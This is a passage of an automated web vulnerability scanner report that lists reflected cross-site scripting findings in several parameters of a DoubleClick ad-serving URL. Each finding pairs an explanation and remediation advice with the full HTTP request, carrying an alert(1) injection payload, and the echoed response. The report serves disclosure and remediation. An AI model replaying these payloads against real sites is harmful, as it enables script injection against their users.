GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=b6b43"-alert(1)-"4b5b2d05a2f HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7855
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:09:02 GMT
Expires: Thu, 03 Feb 2011 16:09:02 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
UzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=b6b43"-alert(1)-"4b5b2d05a2fhttps://www.ally.com/bank/interest-checking-account/index.html?CP=57865897;40155604");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

1.28. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6f88'-alert(1)-'5d816f81708 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQBe6f88'-alert(1)-'5d816f81708&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7857
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:55 GMT
Expires: Thu, 03 Feb 2011 16:08:55 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:38:57 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQBe6f88'-alert(1)-'5d816f81708&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B39213497\">
...[SNIP]...

1.29. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e89c3"-alert(1)-"ea8dd10c3f1 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQBe89c3"-alert(1)-"ea8dd10c3f1&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:55 GMT
Expires: Thu, 03 Feb 2011 16:08:55 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQBe89c3"-alert(1)-"ea8dd10c3f1&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604");
var fscUrl = url;
...[SNIP]...

1.30. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1934"-alert(1)-"9335474a73d was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073b1934"-alert(1)-"9335474a73d&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:09:00 GMT
Expires: Thu, 03 Feb 2011 16:09:00 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073b1934"-alert(1)-"9335474a73d&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

1.31. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0bb5'-alert(1)-'b56bd520db3 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073f0bb5'-alert(1)-'b56bd520db3&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:09:01 GMT
Expires: Thu, 03 Feb 2011 16:09:01 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073f0bb5'-alert(1)-'b56bd520db3&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604\">
...[SNIP]...

1.32. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af15d"-alert(1)-"24557353392 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1af15d"-alert(1)-"24557353392&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7857
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:56 GMT
Expires: Thu, 03 Feb 2011 16:08:56 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:38:57 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
j0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1af15d"-alert(1)-"24557353392&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B39213497");
var fscUrl = url;
var f
...[SNIP]...

1.33. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f94ae'-alert(1)-'43c15411da1 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1f94ae'-alert(1)-'43c15411da1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:56 GMT
Expires: Thu, 03 Feb 2011 16:08:56 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
j0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1f94ae'-alert(1)-'43c15411da1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604\">
...[SNIP]...

1.34. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23ee8'-alert(1)-'ebf157e0bd6 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q23ee8'-alert(1)-'ebf157e0bd6&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:59 GMT
Expires: Thu, 03 Feb 2011 16:08:59 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q23ee8'-alert(1)-'ebf157e0bd6&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604\">
...[SNIP]...

1.35. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4ef6"-alert(1)-"6c82ad39022 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Qe4ef6"-alert(1)-"6c82ad39022&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7857
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:58 GMT
Expires: Thu, 03 Feb 2011 16:08:58 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:38:57 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Qe4ef6"-alert(1)-"6c82ad39022&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B39213497");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode
...[SNIP]...

1.36. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4c51'-alert(1)-'a046432a509 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=lb4c51'-alert(1)-'a046432a509&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
